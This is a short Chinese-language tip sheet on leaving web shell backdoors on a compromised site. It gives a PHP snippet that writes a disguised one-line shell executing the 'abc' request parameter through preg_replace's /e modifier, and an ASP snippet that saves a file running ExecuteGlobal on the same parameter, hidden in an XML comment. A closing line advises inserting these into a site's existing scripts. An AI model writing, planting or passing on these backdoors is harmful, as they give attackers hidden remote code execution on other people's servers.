留shell后门方法
php:
$dir = 'aaa/';
createDir($dir);
$fp = fopen($dir.'xxxx.php', "w");
fputs($fp, '<?php echo "error";preg_replace("/test/e",$_REQUEST[\'abc\'],"jutst test")?>');
fclose($fp);
function createDir($path)
{
if (!file_exists($path))
{
createDir(dirname($path));
mkdir($path, 0777);
}
}
asp:
<%
set xmldoc = Server.CreateObject("Msxml2.DOMDocument.3.0")
xmldoc.loadXml("<p></p>")
xmldoc.documentElement.appendChild xmldoc.createComment("<"+"% If
Request("abc")<>"" Then ExecuteGlobal(Request("abc")) %"+
">")
xmldoc.save(server.mappath("a/a.asp"))
%>
直接插入到网站原来的一些脚本文件中,生成一个一句话,不过小心别插坏了。